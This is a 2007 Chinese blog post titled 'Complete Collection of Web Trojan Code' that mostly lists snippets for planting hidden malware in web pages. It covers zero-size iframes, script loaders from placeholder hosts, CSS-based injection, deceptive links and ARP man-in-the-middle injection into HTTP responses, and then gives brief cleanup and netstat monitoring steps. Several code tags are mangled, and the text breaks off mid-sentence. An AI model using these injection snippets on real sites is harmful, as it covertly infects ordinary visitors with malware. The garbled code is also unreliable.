网页木马代码大全

作者在 2007-07-30 03:19:00 发布以下内容

网页木马代码大全:

一:框架挂马

<i src=地址 width=0 height=0></i>

二:js文件挂马

首先将以下代码
write("<i width='0' height='0' src='地址'></i>");
保存为xxx.js,
则JS挂马代码为
< language=java src=xxx.js></>

三:js变形加密

< language="J.Encode" src=http://www.xxx.com/muma.txt></>
muma.txt可改成任意后缀
四:body挂马

<body ="location='地址';"></body>

五:隐蔽挂马

top.body.innerHTML = top.body.innerHTML + '\r\n

<i src="http://www.xxx.com/muma.htm/"></i>';

六:css中挂马

body {
background-image: url('java:write("< src=http://www.XXX.net/muma.js></>")')}

七:JAJA挂马

< language=java>
open ("地址","","toolbar=no,location=no,directories=no,status=no,

menubar=no,scro llbars=no,width=1,height=1");
</>

八:图片伪装

<html>
<i src="网马地址" height=0 width=0></i>
<img src="图片地址"></center>
</html>

九:伪装调用:

<set rows="444,0" cols="*">
< src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
< src="网马地址" border="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</set>

十:高级欺骗

<a href=http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)

Over="www_163_com(); return true;"> 页面要显示的内容 </a>
< Language="Java">
www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,

menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</>

十一: 超级网马—通过arp欺骗来直接挂马

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <i>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

如何处理网页木马:

1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm

2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...

3、修改键值wm.htm为wm_nnd.htm。

4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。
cain.exe,据说是密码嗅探器。

5、修改键值cain.exe为cain_nnd.exe。

6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。

7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。

8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序

9、发现temp*.exe(全名记不清了),立马net stop server 。

10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。

11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。

12、观察了几天,没再发生挂马的现象。

另外,通过检测网络连接查看服务器是否中了木马或病毒

1、使用netstat -an 查看所有和本地计算机建立连接的IP。

2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。

3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下

REM 注释:监控的时间
time /t>>Netstat.log
REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件
Netstat -n -p tcp 30>>Netstat.log

注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。

仅仅这些还不够,说说更严重的:

1、可恶的攻击者喜欢使用克隆账号的方法来控制你的

系统专栏 | 阅读 4872 次
文章评论,共2条
wtyi
2007-07-30 08:05
1
好久前就看过了  再看一次  呵呵
system32(作者)
2007-07-30 09:25
2
那就让你复习复习
游客请输入验证码
浏览58045次
文章归档